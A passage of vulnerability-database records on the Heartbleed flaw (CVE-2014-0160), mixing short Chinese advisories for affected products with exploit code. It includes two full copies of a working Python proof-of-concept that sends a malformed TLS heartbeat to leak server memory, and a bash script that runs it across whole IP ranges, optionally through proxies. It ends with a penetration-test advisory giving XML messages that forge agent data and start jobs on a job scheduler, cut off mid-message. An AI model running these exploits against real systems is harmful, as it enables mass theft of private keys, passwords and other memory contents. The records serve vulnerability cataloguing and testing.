ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "cvss3": {}, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford 
(jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n 
sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nKerio Control\u662f\u4e00\u6b3e\u9632\u706b\u5899\u7cfb\u7edf\u3002\r\n\r\nKerio Control\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nKerio Control 8.x\nKerio Control 8.2.2 patch2\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.kerio.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Kerio Control OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62189", "id": "SSV:62189", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE 
ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:32", "description": "CVE ID:CVE-2014-0160\r\n\r\nAttachmate Reflection\u662f\u4e00\u6b3e\u4f18\u79c0\u7684Unix\u7ec8\u7aef\u4eff\u771f\u8f6f\u4ef6\u3002\r\n\r\nAttachmate Reflection\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nAttachmate Reflection 
14.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.attachmate.com/", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Attachmate Reflection OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62180", "id": "SSV:62180", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:31:20", "description": "CVE ID:CVE-2014-0160\r\n\r\nSAP Sybase SQL Anywhere\u662f\u4e00\u5957\u5168\u9762\u7684\u89e3\u51b3\u65b9\u6848,\u5b83\u63d0\u4f9b\u4e86\u6570\u636e\u7ba1\u7406\u3001\u540c\u6b65\u548c\u6570\u636e\u4ea4\u6362\u6280\u672f,\u53ef\u5feb\u901f\u5728\u8fdc\u7a0b\u548c\u79fb\u52a8\u73af\u5883\u4e2d\u5f00\u53d1\u5e76\u914d\u7f6e\u6570\u636e\u5e93\u9a71\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSAP Sybase SQL Anywhere\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSAP Sybase SQL Anywhere 12.x\r\nSAP Sybase SQL Anywhere 16.x\nSAP Sybase SQL Anywhere 12.01 ebf 4099\u621616.0 ebf 1881\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.sap.com", "cvss3": {}, "published": "2014-04-21T00:00:00", "title": "SAP Sybase SQL Anywhere OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62244", "id": "SSV:62244", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:31", "description": "", "cvss3": {}, "published": "2014-04-23T00:00:00", "type": "packetstorm", "title": "Mass Bleed 20140423", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-23T00:00:00", "id": "PACKETSTORM:126288", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? 
\n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print 
$6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:11:38", "description": "", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "TLS Heartbeat Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126072", "href": "https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. 
\n# Modified by Csaba Fitzl for multiple SSL / TLS version support \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nversion = [] \nversion.append(['SSL 3.0','03 00']) \nversion.append(['TLS 1.0','03 01']) \nversion.append(['TLS 1.1','03 02']) \nversion.append(['TLS 1.2','03 03']) \n \ndef create_hello(version): \nhello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \nreturn hello \n \ndef create_hb(version): \nhb = h2bin('18 ' + version + ' 00 03 01 40 00') \nreturn hb \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s,hb): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \nfor i in range(len(version)): \nprint 'Trying ' + version[i][0] + '...' \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(create_hello(version[i][1])) \nprint 'Waiting for Server Hello...' 
\nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(create_hb(version[i][1])) \nif hit_hb(s,create_hb(version[i][1])): \n#Stop if vulnerable \nbreak \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T18:50:49", "description": "", "cvss3": {}, "published": "2019-01-16T00:00:00", "type": "packetstorm", "title": "Streamworks Job Scheduler Release 7 Authentication Weakness", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151177", "href": "https://packetstormsecurity.com/files/151177/Streamworks-Job-Scheduler-Release-7-Authentication-Weakness.html", "sourceData": "` \nAffected Products \nStreamworks Job Scheduler Release 7 (older/newer releases have not \nbeen tested) \n \nReferences \nSecuvera-SA-2016-01 \nhttps://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for \nupdates) \nNo CVE number could be assigned (vendor not listed under \ncve.mitre.org/data/board/archives/2016-01/msg00015.html) \n \nSummary: \nArvato Systems Streamworks Job Scheduler is a software product for \nautomation purposes. It helps \n\"to plan, maintain, control and monitor all of your automatable IT \nprocesses\" (source: vendor product \nhomepage). It consists of different types of services: an \napplication server daemon, a processing \nserver daemon that controls one or multiple agent daemins \ninstalled on operating servers were workload \nhas to be done. 
\n \nDuring a penetration test at a customer's site three weaknesses \nconcerning communication \nauthentication were discovered: \n \n1) All agents installed on server systems use the same X.509 \ncertificates and private key that \nwere issued by the vendor for authentication. \n \n2) The processing server component does not check received \nmessages properly for authenticity. \n \n3) Agents installed on servers do not check received messages \nproperly for authenticity \n \n4) Agents and processing servers are vulnerable against TLS \nHeartbleed attack (CVE-2014-0160 - \nsee https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160) \n \nEffect: \n1) If systems were compromised and authentication material is \nstolen, all certificates have to be \nrevoked and replaced. In addition, this expands the effect of \n3) to the entire environment, \nnot just single systems. \n \n2) An attacker with knowledge of the message syntax of the product \nand the authentication material \nis able to add, change or delete data within the Streamworks database. \n \n3) An attacker with knowledge of the message syntax of the product \nand the authentication material \nis able to create new or execute available jobs on servers with \nagents installed located within \nthe same network. This can lead to a complete loss of integrity, \nconfidentiality or availability \nof the respective system or data stored/processed on it. \n \n4) An unauthenticated remote attacker is able to read content \nwithin system memory. \n \nVulnerable components and scripts: \nStreamworks Job Scheduler Processing Server Release 7.1 \nStreamworks Job Scheduler Agent Release 7.1 \nolder releases have not been tested \n \nExamples: \nIn the following, a sample to exploit 2) and 3) will be given. 
\nReplace Information within squared \nbrackets: \n \n2) By sending a the following XML-Message to a Processing server \nit is possible to change system \ninformation of a legitimate configured client as proof-of-concept. \nThe System OS Info was slightly \nchanged: \n \n<AgentNotifyStarted ProcessId=\"7044\" AgentVersion=\"3.1.36\"> \n<ComHeader Version=\"1.0\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime> \n<SourceEndpoint Address=\"0.0.0.0\" Port=\"30000\" SysId=\"[Hostname of \nlegitimate Client]\" /> \n<DestinationEndpoint Address=\"[FQDN of Processing server]\" \nPort=\"9600\" SysId=\"[FQDN of Proces \nsing server]\" /> \n<Sequence>0</Sequence> \n</ComHeader> \n<SystemInformation> \n<OsType>Windows</OsType> \n<OsInfo>Pentest Windows!</OsInfo> \n<OsLocale>de_DE.windows-1252</OsLocale> \n</SystemInformation> \n<KnownJobsList> \n</KnownJobsList> \n<FileTransferOptions Mode=\"ALL\" BlockSize=\"0\" /> \n<Cli CliOptions=\"Enabled\" /> \n</AgentNotifyStarted> \n \n \n------------- \n \n \n3) By sending a XML-Message of the following type to create and \nexecute a new job on a system \n<ServerRequestStartJob> \n<ComHeader Version=\"0.1\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime> \n<SourceEndpoint Address=\"[FQDN of processing server]\" \nPort=\"9600\" SysId=\"[FQDN of processing \nserver]\" /> \n<DestinationEndpoint Address=\"[IP of Server with agent \ninstalled]\" Port=\"30000\" SysId=\"[Hostname of \nserver with agent installed]\" /> \n<Sequence>1</Sequence> \n<MandatorId>0100</MandatorId> \n</ComHeader> \n<JobStartInfo> \n<JobInfo ServerJobId=\"118291965_1\" ExecutionNo=\"1\" \nPlanDate=\"[YYYY]-[MM]-[DD]\" \nStreamName=\"[NewStreamName]\" JobName=\"[NewJobName]\" Run=\"1\" /> 
